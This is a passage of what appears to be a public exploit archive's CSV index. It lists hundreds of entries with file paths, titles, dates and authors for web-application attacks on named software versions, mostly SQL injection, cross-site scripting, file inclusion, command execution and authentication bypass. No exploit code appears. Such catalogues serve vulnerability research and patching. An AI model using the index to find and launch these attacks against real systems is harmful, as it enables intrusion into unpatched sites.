sakamaniaka",webapps,php, +21358,exploits/php/webapps/21358.sh,"SquirrelMail 1.2.x - Theme Remote Command Execution",2002-03-28,"pokleyzz sakamaniaka",webapps,php, +21374,exploits/cgi/webapps/21374.txt,"IBM Informix Web Datablade 4.1x - Page Request SQL Injection",2002-04-11,"Simon Lodal",webapps,cgi, +21377,exploits/php/webapps/21377.txt,"SunShop Shopping Cart 1.5/2.x - User-Embedded Scripting",2002-04-13,ppp-design,webapps,php, +21380,exploits/php/webapps/21380.php,"Burning Board 1.1.1 - 'URL' Manipulation",2002-04-15,SeazoN,webapps,php, +21381,exploits/php/webapps/21381.txt,"XGB Guestbook 1.2 - User-Embedded Scripting",2002-04-15,Firehack,webapps,php, +21382,exploits/php/webapps/21382.txt,"XGB 1.2 - Remote Form Field Input Validation",2002-04-14,Firehack,webapps,php, +21383,exploits/php/webapps/21383.txt,"xNewsletter 1.0 - Form Field Input Validation",2002-04-14,Firehack,webapps,php, +21391,exploits/php/webapps/21391.txt,"PVote 1.0/1.5 - Poll Content Manipulation",2002-04-18,"Daniel Nyström",webapps,php, +21392,exploits/windows/webapps/21392.txt,"SpiceWorks 6.0.00993 - Multiple Script Injection Vulnerabilities",2012-09-19,LiquidWorm,webapps,windows, +21393,exploits/php/webapps/21393.txt,"WordPress Plugin wp-topbar 4.02 - Multiple Vulnerabilities",2012-09-19,"Blake Entrekin",webapps,php, +21394,exploits/windows/webapps/21394.txt,"SonicWALL email security 7.3.5 - Multiple Vulnerabilities",2012-09-19,Vulnerability-Lab,webapps,windows, +21395,exploits/hardware/webapps/21395.txt,"Fortigate UTM WAF Appliance - Multiple Vulnerabilities",2012-09-19,Vulnerability-Lab,webapps,hardware, +21396,exploits/php/webapps/21396.txt,"torrenttrader 2.08 - Multiple Vulnerabilities",2012-09-19,waraxe,webapps,php, +21397,exploits/php/webapps/21397.txt,"PVote 1.0/1.5 - Unauthorized Administrative Password Change",2002-04-18,"Daniel Nyström",webapps,php, +21399,exploits/php/webapps/21399.txt,"IcrediBB 1.1 - Script Injection",2002-04-19,"Daniel Nyström",webapps,php, +21400,exploits/asp/webapps/21400.txt,"Snitz Forums 2000 3.x - 'members.asp' SQL Injection",2002-04-19,acemi,webapps,asp, +21401,exploits/php/webapps/21401.txt,"PostBoard 2.0 - BBCode IMG Tag Script Injection",2002-04-19,gcsb,webapps,php, +21403,exploits/php/webapps/21403.txt,"PostBoard 2.0 - Topic Title Script Execution",2002-04-19,gcsb,webapps,php, +21405,exploits/cgi/webapps/21405.txt,"Jon Howell Faq-O-Matic 2.7 - Cross-Site Scripting",2002-04-20,BrainRawt,webapps,cgi, +21406,exploits/cgi/webapps/21406.txt,"Philip Chinery's Guestbook 1.1 - Script Injection",2002-04-21,"markus arndt",webapps,cgi, +21411,exploits/cgi/webapps/21411.txt,"vqServer 1.9.x - CGI Demo Program Script Injection",2002-04-21,"Matthew Murphy",webapps,cgi, +21417,exploits/hardware/webapps/21417.py,"Thomson Wireless VoIP Cable Modem - Authentication Bypass",2012-09-20,"Glafkos Charalambous",webapps,hardware, +21418,exploits/php/webapps/21418.txt,"Manhali 1.8 - Local File Inclusion",2012-09-20,L0n3ly-H34rT,webapps,php, +21421,exploits/php/webapps/21421.txt,"PHProjekt 2.x/3.x - Authentication Bypass",2002-04-25,"Ulf Harnhammar",webapps,php, +21423,exploits/php/webapps/21423.txt,"Ultimate PHP Board 1.0/1.1 - Image Tag Script Injection",2002-04-25,frog,webapps,php, +21424,exploits/php/webapps/21424.txt,"ADManager 1.1 - Content Manipulation",2002-04-17,frog,webapps,php, +21425,exploits/php/webapps/21425.txt,"DNSTools 2.0 - Authentication Bypass",2002-04-28,ppp-design,webapps,php, +21426,exploits/php/webapps/21426.txt,"Blahz-DNS 0.2 - Direct Script Call Authentication Bypass",2002-04-28,ppp-design,webapps,php, +21427,exploits/php/webapps/21427.txt,"MiniBB 1.2 - Cross-Site Scripting",2002-04-17,frog,webapps,php, +22216,exploits/php/webapps/22216.txt,"Bitweaver 2.8.1 - Multiple Vulnerabilities",2012-10-24,"Trustwave's SpiderLabs",webapps,php, +21433,exploits/cgi/webapps/21433.txt,"MyGuestbook 1.0 - Script Injection",2002-04-30,BrainRawt,webapps,cgi, +21434,exploits/asp/webapps/21434.txt,"Outfront Spooky 2.x - Login SQL Query Manipulation Password",2002-05-02,anonymous,webapps,asp, +21435,exploits/cgi/webapps/21435.txt,"askSam 4.0 Web Publisher - Cross-Site Scripting",2002-05-05,frog,webapps,cgi, +21436,exploits/php/webapps/21436.txt,"B2 0.6 - 'b2edit.showposts.php?b2inc' Remote File Inclusion",2002-05-06,Frank,webapps,php, +21447,exploits/php/webapps/21447.txt,"XMB Forum 1.6 - Magic Lantern Cross-Site Scripting",2002-05-11,frog,webapps,php, +21448,exploits/php/webapps/21448.txt,"XMB Forum 1.6 - Magic Lantern Log File",2002-05-11,frog,webapps,php, +21449,exploits/php/webapps/21449.txt,"NOCC 0.9.x - Webmail Script Injection",2002-05-14,ppp-design,webapps,php, +21454,exploits/php/webapps/21454.txt,"Clicky Web Pseudo-frames 1.0 - Remote File Inclusion",2002-05-12,frog,webapps,php, +21455,exploits/asp/webapps/21455.txt,"Hosting Controller 1.x - DSNManager Directory Traversal",2002-05-17,hdlkha,webapps,asp, +21457,exploits/asp/webapps/21457.txt,"Hosting Controller 1.4 - Import Root Directory Command Execution",2002-05-17,hdlkha,webapps,asp, +21459,exploits/php/webapps/21459.txt,"Phorum 3.3.2a - Remote Command Execution",2002-05-17,"markus arndt",webapps,php, +21460,exploits/cgi/webapps/21460.pl,"CGIScript.net 1.0 - Information Disclosure",2002-05-17,"Steve Gustin",webapps,cgi, +21461,exploits/php/webapps/21461.txt,"Phorum 3.3.2 - Cross-Site Scripting",2002-05-18,"markus arndt",webapps,php, +21463,exploits/php/webapps/21463.txt,"mcNews 1.x - File Disclosure",2002-05-17,frog,webapps,php, +21464,exploits/asp/webapps/21464.txt,"Hosting Controller 1.x - 'Browse.asp' File Disclosure",2002-05-19,"Bao Dai Nhan",webapps,asp, +21473,exploits/cgi/webapps/21473.txt,"ViewCVS 0.9.2 - Cross-Site Scripting",2002-05-24,office,webapps,cgi, +21474,exploits/php/webapps/21474.txt,"OpenBB 1.0.0 RC3 - BBCode Cross Agent HTML Injection",2002-05-24,frog,webapps,php, +21478,exploits/php/webapps/21478.txt,"OpenBB 1.0 - Unauthorized Moderator Access",2002-05-24,frog,webapps,php, +21479,exploits/php/webapps/21479.txt,"OpenBB 1.0.0 RC3 - Cross-Site Scripting",2002-05-24,frog,webapps,php, +21480,exploits/cgi/webapps/21480.txt,"GNU Mailman 2.0.x - Admin Login Cross-Site Scripting",2002-05-20,office,webapps,cgi, +21486,exploits/php/webapps/21486.txt,"PHPBB2 - Image Tag HTML Injection",2002-05-26,"Martijn Boerwinkel",webapps,php, +21487,exploits/cgi/webapps/21487.pl,"Image Display System 0.8.1 - Directory Existence Disclosure",2002-05-28,isox,webapps,cgi, +21493,exploits/cfm/webapps/21493.txt,"Gafware CFXImage 1.6.4/1.6.6 - ShowTemp File Disclosure",2002-05-29,"Richard Brain",webapps,cfm, +21494,exploits/cgi/webapps/21494.txt,"CGIScript.net - 'csPassword.cgi' 1.0 Information Disclosure",2002-05-30,"Steve Gustin",webapps,cgi, +21495,exploits/cgi/webapps/21495.txt,"CGIScript.net - 'csPassword.cgi' 1.0 HTAccess File Modification",2002-05-30,"Steve Gustin",webapps,cgi, +21509,exploits/php/webapps/21509.txt,"Teekai Tracking Online 1.0 - Cross-Site Scripting",2002-06-03,frog,webapps,php, +21514,exploits/php/webapps/21514.txt,"Splatt Forum 3.0 - Image Tag HTML Injection",2002-06-06,MegaHz,webapps,php, +21517,exploits/php/webapps/21517.txt,"Voxel Dot Net CBms 0.x - Multiple Code Injection Vulnerabilities",2002-06-06,"Ulf Harnhammar",webapps,php, +21519,exploits/php/webapps/21519.txt,"MyHelpDesk 20020509 - HTML Injection",2002-06-10,"Ahmet Sabri ALPER",webapps,php, +21524,exploits/php/webapps/21524.txt,"ViArt Shop Evaluation 4.1 - Multiple Remote File Inclusions",2012-09-26,L0n3ly-H34rT,webapps,php, +21525,exploits/php/webapps/21525.txt,"Geeklog 1.3.5 - Multiple Cross-Site Scripting Vulnerabilities",2002-06-10,"Ahmet Sabri ALPER",webapps,php, +21526,exploits/php/webapps/21526.txt,"MyHelpDesk 20020509 - Cross-Site Scripting",2002-06-10,"Ahmet Sabri ALPER",webapps,php, +21527,exploits/php/webapps/21527.txt,"MyHelpDesk 20020509 - SQL Injection",2002-06-10,"Ahmet Sabri ALPER",webapps,php, +21528,exploits/php/webapps/21528.txt,"Geeklog 1.3.5 - Calendar Event Form Script Injection",2002-06-10,"Ahmet Sabri ALPER",webapps,php, +21529,exploits/php/webapps/21529.txt,"W-Agora 4.1.x - Remote File Inclusion",2002-06-10,frog,webapps,php, +21532,exploits/cgi/webapps/21532.txt,"CGIScript.net csNews 1.0 - Double URL Encoding Unauthorized Administrative Access",2002-06-11,"Steve Gustin",webapps,cgi, +21533,exploits/cgi/webapps/21533.txt,"CGIScript.net csNews 1.0 - Header File Type Restriction Bypass",2002-06-11,"Steve Gustin",webapps,cgi, +21535,exploits/cgi/webapps/21535.txt,"MakeBook 2.2 - Form Field Input Validation",2002-06-12,b0iler,webapps,cgi, +21543,exploits/java/webapps/21543.txt,"Ruslan Communications Builder - Authentication Bypass",2002-06-13,"Alexander Korchagin",webapps,java, +21545,exploits/jsp/webapps/21545.txt,"JAMF Casper Suite MDM - Cross-Site Request Forgery",2012-09-27,"Jacob Holcomb",webapps,jsp, +21546,exploits/windows/webapps/21546.py,"Trend Micro Control Manager 5.5/6.0 AdHocQuery - Authenticated Blind SQL Injection",2012-09-27,otoy,webapps,windows, +21552,exploits/php/webapps/21552.txt,"PHP Classifieds 6.0.5 - Cross-Site Scripting",2002-06-14,windows-1256,webapps,php, +21553,exploits/cgi/webapps/21553.txt,"Mewsoft NetAuction 3.0 - Cross-Site Scripting",2002-06-14,windows-1256,webapps,cgi, +21557,exploits/php/webapps/21557.txt,"ZeroBoard 4.1 - PHP Include File Arbitrary Command Execution",2002-06-15,onlooker,webapps,php, +21558,exploits/cgi/webapps/21558.txt,"My Postcards 6.0 - 'MagicCard.cgi' Arbitrary File Disclosure",2002-06-15,cult,webapps,cgi, +21562,exploits/java/webapps/21562.txt,"Wolfram Research webMathematica 4.0 - File Disclosure",2002-06-17,"Andrew Badr",webapps,java, +21563,exploits/php/webapps/21563.txt,"osCommerce 2.1 - Remote File Inclusion",2002-06-16,"Tim Vandermeerch",webapps,php, +21564,exploits/php/webapps/21564.txt,"PHP-Address 0.2 e - Remote File Inclusion",2002-06-17,"Tim Vandermeerch",webapps,php, +21567,exploits/cgi/webapps/21567.pl,"WebScripts WebBBS 4.x/5.0 - Remote Command Execution",2002-06-06,"NERF Security",webapps,cgi, +21570,exploits/php/webapps/21570.txt,"BasiliX Webmail 1.1 - Message Content Script Injection",2002-06-19,"Ulf Harnhammar",webapps,php, +21573,exploits/cgi/webapps/21573.txt,"YaBB 1 - Invalid Topic Error Page Cross-Site Scripting",2002-06-21,methodic,webapps,cgi, +21587,exploits/cgi/webapps/21587.txt,"BBC Education Betsie 1.5 - Parserl.pl Cross-Site Scripting",2002-07-01,"Mark Rowe",webapps,cgi, +21588,exploits/cgi/webapps/21588.txt,"BlackBoard 5.0 - Cross-Site Scripting",2002-07-01,"Berend-Jan Wever",webapps,cgi, +21590,exploits/php/webapps/21590.txt,"phpAuction 1/2 - Unauthorized Administrative Access",2002-07-02,ethx,webapps,php, +21609,exploits/cgi/webapps/21609.txt,"Fluid Dynamics Search Engine 2.0 - Cross-Site Scripting",2002-07-10,VALDEUX,webapps,cgi, +21610,exploits/php/webapps/21610.txt,"Sun i-Runbook 2.5.2 - Directory and File Content Disclosure",2002-07-11,JWC,webapps,php, +21617,exploits/cgi/webapps/21617.txt,"IMHO Webmail 0.9x - Account Hijacking",2002-07-15,"Security Bugware",webapps,cgi, +21621,exploits/jsp/webapps/21621.txt,"Macromedia Sitespring 1.2 - Default Error Page Cross-Site Scripting",2002-07-17,"Peter Gründl",webapps,jsp, +21622,exploits/php/webapps/21622.txt,"PHP-Wiki 1.2/1.3 - Cross-Site Scripting",2002-07-17,Pistone,webapps,php, +21628,exploits/php/webapps/21628.txt,"Geeklog 1.3.5 - HTML Attribute Cross-Site Scripting",2002-07-19,"Ulf Harnhammar",webapps,php, +21640,exploits/php/webapps/21640.txt,"Cobalt Qube 3.0 - Authentication Bypass",2002-07-24,pokley,webapps,php, +21646,exploits/php/webapps/21646.py,"WordPress Theme Archin 3.2 - Unauthenticated Configuration Access",2012-10-01,bwall,webapps,php, +21658,exploits/cgi/webapps/21658.html,"Ben Chivers Easy Homepage Creator 1.0 - File Modification",2002-07-29,"Arek Suroboyo",webapps,cgi, +21659,exploits/cgi/webapps/21659.html,"Ben Chivers Easy Guestbook 1.0 - Administrative Access",2002-07-29,"Arek Suroboyo",webapps,cgi, +21660,exploits/php/webapps/21660.txt,"phpBB2 Gender Mod 1.1.3 - SQL Injection",2002-07-29,"langtuhaohoa caothuvolam",webapps,php, +21661,exploits/php/webapps/21661.txt,"dotProject 0.2.1 - User Cookie Authentication Bypass",2002-07-29,pokleyzz,webapps,php, +21665,exploits/php/webapps/21665.txt,"phptax 0.8 - Remote Code Execution",2012-10-02,"Jean Pascal Pereira",webapps,php, +21668,exploits/php/webapps/21668.txt,"ShoutBox 1.2 - 'Form' HTML Injection",2002-07-29,delusion,webapps,php, +40361,exploits/php/webapps/40361.py,"Cherry Music 0.35.1 - Arbitrary File Disclosure",2016-09-13,feedersec,webapps,php,80 +40364,exploits/php/webapps/40364.txt,"wdCalendar 2 - SQL Injection",2016-09-13,"Alfonso Castillo Angel",webapps,php,80 +40366,exploits/php/webapps/40366.txt,"Contrexx CMS egov Module 1.0.0 - SQL Injection",2016-09-13,"hamidreza borghei",webapps,php,80 +40367,exploits/cgi/webapps/40367.sh,"Exper EWM-01 ADSL/MODEM - Unauthenticated DNS Change",2016-09-13,"Todor Donev",webapps,cgi,80 +21676,exploits/php/webapps/21676.txt,"Bharat Mediratta Gallery 1.x - Remote File Inclusion",2002-08-01,PowerTech,webapps,php, +21679,exploits/cgi/webapps/21679.txt,"Dispair 0.1/0.2 - Remote Command Execution",2002-07-30,anonymous,webapps,cgi, +21702,exploits/asp/webapps/21702.txt,"Midicart ASP - Remote Customer Information Retrieval",2002-08-10,"Dimitri Sekhniashvili",webapps,asp, +21708,exploits/php/webapps/21708.txt,"Leszek Krupinski L-Forum 2.4 - Search Script SQL Injection",2002-08-14,"Matthew Murphy",webapps,php, +21715,exploits/php/webapps/21715.txt,"WordPress Plugin spider Calendar - Multiple Vulnerabilities",2012-10-03,D4NB4R,webapps,php, +21716,exploits/php/webapps/21716.txt,"Omnistar Mailer 7.2 - Multiple Vulnerabilities",2012-10-03,Vulnerability-Lab,webapps,php, +21723,exploits/php/webapps/21723.txt,"Ilia Alshanetsky FUDForum 1.2.8/1.9.8/2.0.2 - File Disclosure",2002-08-19,"Ulf Harnhammar",webapps,php, +21724,exploits/php/webapps/21724.txt,"Ilia Alshanetsky FUDForum 1.2.8/1.9.8/2.0.2 - File Modification",2002-08-19,"Ulf Harnhammar",webapps,php, +21727,exploits/php/webapps/21727.txt,"Mantis 0.15.x/0.16/0.17.x - JPGraph Remote File Inclusion Command Execution",2002-08-19,"Joao Gouveia",webapps,php, +21728,exploits/cgi/webapps/21728.txt,"Kerio MailServer 5.0/5.1 Web Mail - Multiple Cross-Site Scripting Vulnerabilities",2002-08-19,"Abraham Lincoln",webapps,cgi, +21729,exploits/cgi/webapps/21729.txt,"Mozilla Bonsai - Multiple Cross-Site Scripting Vulnerabilities",2002-08-20,"Stan Bubrouski",webapps,cgi, +21730,exploits/cgi/webapps/21730.txt,"Mozilla Bonsai 1.3 - Full Path Disclosure",2002-08-20,"Stan Bubrouski",webapps,cgi, +21834,exploits/php/webapps/21834.rb,"phpMyAdmin 3.5.2.2 - 'server_sync.php' Backdoor (Metasploit)",2012-10-10,Metasploit,webapps,php, +21740,exploits/php/webapps/21740.txt,"phpMyChat Plus 1.94 RC1 - Multiple Vulnerabilities",2012-10-04,L0n3ly-H34rT,webapps,php, +21742,exploits/php/webapps/21742.txt,"Template CMS 2.1.1 - Multiple Vulnerabilities",2012-10-04,"High-Tech Bridge SA",webapps,php, +21743,exploits/php/webapps/21743.txt,"phpMyBitTorrent 2.04 - Multiple Vulnerabilities",2012-10-04,waraxe,webapps,php, +21744,exploits/windows/webapps/21744.txt,"Novell Sentinel Log Manager 1.2.0.2 - Retention Policy",2012-10-04,"Piotr Chmylkowski",webapps,windows, +21745,exploits/php/webapps/21745.txt,"Achievo 0.7/0.8/0.9 - Remote File Inclusion Command Execution",2002-08-22,"Jeroen Latour",webapps,php, +21755,exploits/php/webapps/21755.txt,"PHPReactor 1.2.7 - Style Attribute HTML Injection",2002-08-24,"Matthew Murphy",webapps,php, +21766,exploits/asp/webapps/21766.txt,"FactoSystem Weblog 0.9/1.0/1.1 - Multiple SQL Injections",2002-08-31,"Matthew Murphy",webapps,asp, +21768,exploits/cgi/webapps/21768.txt,"Super Site Searcher - Remote Command Execution",2002-09-03,luca.ercoli,webapps,cgi, +21769,exploits/cgi/webapps/21769.txt,"Aestiva HTML/OS 2.4 - Cross-Site Scripting",2002-09-03,eax@3xT.org,webapps,cgi, +21776,exploits/php/webapps/21776.txt,"PHP 4.2.3 - Header Function Script Injection",2002-09-07,"Matthew Murphy",webapps,php, +21778,exploits/php/webapps/21778.txt,"phpGB 1.x - SQL Injection",2002-09-09,ppp-design,webapps,php, +21779,exploits/php/webapps/21779.txt,"WoltLab Burning Board 2.0 - SQL Injection",2002-09-09,Cano2,webapps,php, +21780,exploits/php/webapps/21780.txt,"phpGB 1.1 - HTML Injection",2002-09-09,ppp-design,webapps,php, +21783,exploits/php/webapps/21783.txt,"PHPGB 1.1/1.2 - PHP Code Injection",2002-09-09,ppp-design,webapps,php, +21786,exploits/php/webapps/21786.php,"Blog Mod 0.1.9 - 'index.php?month' SQL Injection",2012-10-07,WhiteCollarGroup,webapps,php, +21802,exploits/cgi/webapps/21802.txt,"Lycos HTMLGear - guestGear CSS HTML Injection",2002-09-17,"Matthew Murphy",webapps,cgi, +21809,exploits/php/webapps/21809.txt,"Web Help Desk by SolarWinds - Persistent Cross-Site Scripting",2012-10-08,loneferret,webapps,php, +21811,exploits/php/webapps/21811.txt,"SquirrelMail 1.2.6/1.2.7 - Multiple Cross-Site Scripting Vulnerabilities",2002-09-19,"DarC KonQuest",webapps,php, +21817,exploits/php/webapps/21817.txt,"Rudi Benkovic JAWMail 1.0 - Script Injection",2002-09-23,"Ulf Harnhammar",webapps,php, +21886,exploits/php/webapps/21886.txt,"Py-Membres 3.1 - 'index.php' Unauthorized Access",2002-10-02,frog,webapps,php, +21822,exploits/multiple/webapps/21822.txt,"Endpoint Protector 4.0.4.0 - Multiple Vulnerabilities",2012-10-09,Vulnerability-Lab,webapps,multiple, +21825,exploits/php/webapps/21825.txt,"phpWebSite 0.8.2 - PHP File Inclusion",2002-09-23,"Tim Vandermeersch",webapps,php, +21829,exploits/php/webapps/21829.txt,"XOOPS 1.0 RC3 - HTML Injection",2002-09-24,das@hush.com,webapps,php, +21835,exploits/php/webapps/21835.rb,"qdPM 7.0 - Arbitrary '.PHP' File Upload (Metasploit)",2012-10-10,Metasploit,webapps,php, +21836,exploits/linux/webapps/21836.rb,"Auxilium RateMyPet - Arbitrary File Upload (Metasploit)",2012-10-10,Metasploit,webapps,linux, +21855,exploits/php/webapps/21855.txt,"PHP-Nuke 6.0/6.5 - Search Form Cross-Site Scripting",2002-09-24,"Mark Grimes",webapps,php, +21859,exploits/php/webapps/21859.txt,"PHP-Nuke 6.0 - News Message HTML Injection",2002-09-25,das@hush.com,webapps,php, +21860,exploits/php/webapps/21860.txt,"NPDS 4.8 - News Message HTML Injection",2002-09-25,das@hush.com,webapps,php, +21861,exploits/php/webapps/21861.txt,"DaCode 1.2 - News Message HTML Injection",2002-09-25,das@hush.com,webapps,php, +21862,exploits/php/webapps/21862.txt,"PHP-Nuke 6.0 - 'modules.php' SQL Injection",2002-09-25,"Pedro Inacio",webapps,php, +21863,exploits/php/webapps/21863.txt,"Drupal 4.0 - News Message HTML Injection",2002-09-25,das@hush.com,webapps,php, +21864,exploits/php/webapps/21864.txt,"phpWebSite 0.8.3 - News Message HTML Injection",2002-09-25,das@hush.com,webapps,php, +21866,exploits/multiple/webapps/21866.txt,"ServersCheck Monitoring Software 9.0.12/9.0.14 - Persistent Cross-Site Scripting",2012-10-10,loneferret,webapps,multiple, +21891,exploits/php/webapps/21891.txt,"vOlk Botnet Framework 4.0 - Multiple Vulnerabilities",2012-10-11,Vulnerability-Lab,webapps,php, +21873,exploits/php/webapps/21873.txt,"PostNuke 0.72 - 'modules.php' Cross-Site Scripting",2002-09-26,"Mark Grimes",webapps,php, +21874,exploits/php/webapps/21874.txt,"vBulletin 2.0.3 - 'calendar.php' Command Execution",2002-09-27,gosper,webapps,php, +21875,exploits/jsp/webapps/21875.txt,"Jetty 4.1 Servlet Engine - Cross-Site Scripting",2002-09-28,Skinnay,webapps,jsp, +21877,exploits/cgi/webapps/21877.txt,"EmuMail 5.0 - Web Root Full Path Disclosure",2002-09-29,FVS,webapps,cgi, +21878,exploits/cgi/webapps/21878.txt,"EmuMail 5.0 Email Form - Script Injection",2002-09-29,FVS,webapps,cgi, +21879,exploits/java/webapps/21879.txt,"Sun ONE Starter Kit 2.0 / ASTAware SearchDisc 3.1 - Search Engine Directory Traversal",2002-09-30,"ET LoWNOISE",webapps,java, +21890,exploits/php/webapps/21890.txt,"Omnistar Document Manager 8.0 - Multiple Vulnerabilities",2012-10-11,Vulnerability-Lab,webapps,php, +21893,exploits/php/webapps/21893.php,"TightAuction 3.0 - Config.INC Information Disclosure",2002-10-02,frog,webapps,php, +21894,exploits/php/webapps/21894.txt,"Midicart PHP - Information Disclosure",2002-10-02,frog,webapps,php, +21895,exploits/cgi/webapps/21895.txt,"Jetty 3.1.6/3.1.7/4.1 Servlet Engine - Arbitrary Command Execution",2002-10-02,"Matt Moore",webapps,cgi, +21896,exploits/php/webapps/21896.txt,"Midicart PHP - Arbitrary File Upload",2002-10-02,frog,webapps,php, +21899,exploits/php/webapps/21899.txt,"phpWebSite 0.8.3 - 'article.php' Cross-Site Scripting",2002-10-02,Sp.IC,webapps,php, +21900,exploits/php/webapps/21900.txt,"MySimpleNews 1.0 - PHP Injection",2002-10-02,frog,webapps,php, +21901,exploits/php/webapps/21901.txt,"MySimpleNews 1.0 - Remote Readable Administrator Password",2002-10-02,frog,webapps,php, +21903,exploits/php/webapps/21903.txt,"Michael Schatz Books 0.54/0.6 PostNuke Module - Cross-Site Scripting",2002-10-03,Pistone,webapps,php, +21905,exploits/php/webapps/21905.txt,"phpMyNewsletter 0.6.10 - Remote File Inclusion",2002-10-03,frog,webapps,php, +21906,exploits/php/webapps/21906.txt,"phpLinkat 0.1 - Multiple Cross-Site Scripting Vulnerabilities",2002-10-04,Sp.IC,webapps,php, +21912,exploits/php/webapps/21912.txt,"Killer Protection 1.0 - Information Disclosure",2002-10-07,frog,webapps,php, +21914,exploits/asp/webapps/21914.txt,"SSGBook 1.0 - Image Tag HTML Injection",2002-10-08,frog,webapps,asp, +21918,exploits/php/webapps/21918.html,"VBZoom 1.0 - SQL Injection",2002-10-08,hish,webapps,php, +21920,exploits/asp/webapps/21920.txt,"Microsoft Content Management Server 2001 - Cross-Site Scripting",2002-10-09,overclocking_a_la_abuela,webapps,asp, +21921,exploits/php/webapps/21921.txt,"VBZoom 1.0 - Arbitrary File Upload",2002-10-09,hish,webapps,php, +21924,exploits/asp/webapps/21924.txt,"SurfControl SuperScout Email Filter 3.5 - 'MsgError.asp' Cross-Site Scripting",2002-10-08,ken@FTU,webapps,asp, +21925,exploits/asp/webapps/21925.txt,"SurfControl SuperScout Email Filter 3.5 - User Credential Disclosure",2002-10-08,ken@FTU,webapps,asp, +21926,exploits/cgi/webapps/21926.txt,"Authoria HR Suite - 'AthCGI.exe' Cross-Site Scripting",2002-10-09,Max,webapps,cgi, +21930,exploits/php/webapps/21930.txt,"PHPReactor 1.2.7 pl1 - 'browse.php' Cross-Site Scripting",2002-10-10,"Arab VieruZ",webapps,php, +21929,exploits/php/webapps/21929.rb,"Project Pier - Arbitrary File Upload (Metasploit)",2012-10-16,Metasploit,webapps,php, +21931,exploits/php/webapps/21931.txt,"PHPBBMod 1.3.3 - PHPInfo Information Disclosure",2002-10-10,"Roland Verlander",webapps,php, +21933,exploits/php/webapps/21933.txt,"PHPRank 1.8 - 'add.php' Cross-Site Scripting",2002-10-10,"Jedi/Sector One",webapps,php, +21946,exploits/java/webapps/21946.txt,"vBulletin 2.0/2.2.x - Cross-Site Scripting",2002-10-18,Sp.IC,webapps,java, +21950,exploits/php/webapps/21950.txt,"YaBB 1.40/1.41 - Login Cross-Site Scripting",2002-10-18,"Nir Adar",webapps,php, +21956,exploits/php/webapps/21956.txt,"KMMail 1.0 - E-Mail HTML Injection",2002-10-21,"Ulf Harnhammar",webapps,php, +21957,exploits/php/webapps/21957.txt,"PHP Arena PAFileDB 1.1.3/2.1.1/3.0 - 'Email To Friend' Cross-Site Scripting",2002-10-21,ersatz,webapps,php, +21960,exploits/php/webapps/21960.txt,"gBook 1.4 - Administrative Access",2002-10-22,frog,webapps,php, +21961,exploits/php/webapps/21961.txt,"MyMarket 1.71 - 'Form_Header.php' Cross-Site Scripting",2002-10-23,qber66,webapps,php, +21962,exploits/cgi/webapps/21962.txt,"Mojo Mail 2.7 - Email Form Cross-Site Scripting",2002-10-24,"Daniel Boland",webapps,cgi, +21966,exploits/cgi/webapps/21966.txt,"MailReader.com 2.3.x - 'NPH-MR.cgi' File Disclosure",2002-10-28,pokleyzz,webapps,cgi, +21967,exploits/php/webapps/21967.txt,"Benjamin Lefevre Dobermann Forum 0.x - 'entete.php?subpath' Remote File Inclusion",2002-10-28,frog,webapps,php, +21968,exploits/php/webapps/21968.txt,"Benjamin Lefevre Dobermann Forum 0.x - 'enteteacceuil.php?subpath' Remote File Inclusion",2002-10-28,frog,webapps,php, +21969,exploits/php/webapps/21969.txt,"Benjamin Lefevre Dobermann Forum 0.x - 'index.php?subpath' Remote File Inclusion",2002-10-28,frog,webapps,php, +21970,exploits/php/webapps/21970.txt,"Benjamin Lefevre Dobermann Forum 0.x - 'newtopic.php?subpath' Remote File Inclusion",2002-10-28,frog,webapps,php, +21976,exploits/php/webapps/21976.txt,"Jason Orcutt Prometheus 3.0/4.0/6.0 - Remote File Inclusion",2002-11-01,"Karol Wiesek",webapps,php, +21977,exploits/php/webapps/21977.txt,"PHP-Nuke 5.6 - 'modules.php' SQL Injection",2002-11-01,kill9,webapps,php, +21979,exploits/cgi/webapps/21979.txt,"ION Script 1.4 - Remote File Disclosure",2002-11-01,"Zero X",webapps,cgi, +21989,exploits/php/webapps/21989.txt,"Cartweaver 3 - Local File Inclusion",2012-10-15,HaxOr,webapps,php, +21990,exploits/php/webapps/21990.txt,"airVisionNVR 1.1.13 - 'readfile()' Disclosure / SQL Injection",2012-10-15,pennyGrit,webapps,php, +21992,exploits/hardware/webapps/21992.txt,"BigPond 3G21WB - Multiple Vulnerabilities",2012-10-15,"Roberto Paleari",webapps,hardware, +21995,exploits/cgi/webapps/21995.txt,"CuteCast 1.2 - User Credential Disclosure",2002-11-07,Zero-X,webapps,cgi, +22003,exploits/php/webapps/22003.txt,"MyBB Profile Albums Plugin 0.9 - 'albums.php?album' SQL Injection",2012-10-16,Zixem,webapps,php, +22004,exploits/php/webapps/22004.txt,"Joomla! Component com_icagenda - 'id' Multiple Vulnerabilities",2012-10-16,Dark-Puzzle,webapps,php, +22005,exploits/hardware/webapps/22005.txt,"Visual Tools DVR3.0.6.16_ vx series 4.2.19.2 - Multiple Vulnerabilities",2012-10-16,"Andrea Fabrizi",webapps,hardware, +22009,exploits/php/webapps/22009.txt,"EZ Systems HTTPBench 1.1 - Information Disclosure",2002-11-11,"Tacettin Karadeniz",webapps,php, +22015,exploits/cgi/webapps/22015.txt,"W3Mail 1.0.6 - File Disclosure",2002-11-12,"Tim Brown",webapps,cgi, +22017,exploits/php/webapps/22017.txt,"phpBB Advanced Quick Reply Hack 1.0/1.1 - Remote File Inclusion",2002-11-13,"Hai Nam Luke",webapps,php, +22030,exploits/php/webapps/22030.php,"vBulletin 2.0/2.2.x - 'memberlist.php' Cross-Site Scripting",2002-11-22,Sp.IC,webapps,php, +22037,exploits/php/webapps/22037.txt,"PHP-Nuke 5.x/6.0/6.5 Beta 1 - Multiple Cross-Site Scripting Vulnerabilities",2002-11-25,"Matthew Murphy",webapps,php, +22038,exploits/php/webapps/22038.txt,"Sisfokol 4.0 - Arbitrary File Upload",2012-10-17,cr4wl3r,webapps,php, +22039,exploits/php/webapps/22039.txt,"symphony CMS 2.3 - Multiple Vulnerabilities",2012-10-17,Wireghoul,webapps,php, +22040,exploits/jsp/webapps/22040.txt,"ManageEngine Support Center Plus 7908 - Multiple Vulnerabilities",2012-10-17,xistence,webapps,jsp, +22041,exploits/multiple/webapps/22041.txt,"Oracle WebCenter Sites (FatWire Content Server) - Multiple Vulnerabilities",2012-10-17,"SEC Consult",webapps,multiple, +22042,exploits/php/webapps/22042.php,"vBulletin 2.0.x/2.2.x - 'members2.php' Cross-Site Scripting",2002-11-25,Sp.IC,webapps,php, +22043,exploits/php/webapps/22043.txt,"phpBB 2.0.3 - Script Injection",2002-11-25,"Pete Foster",webapps,php, 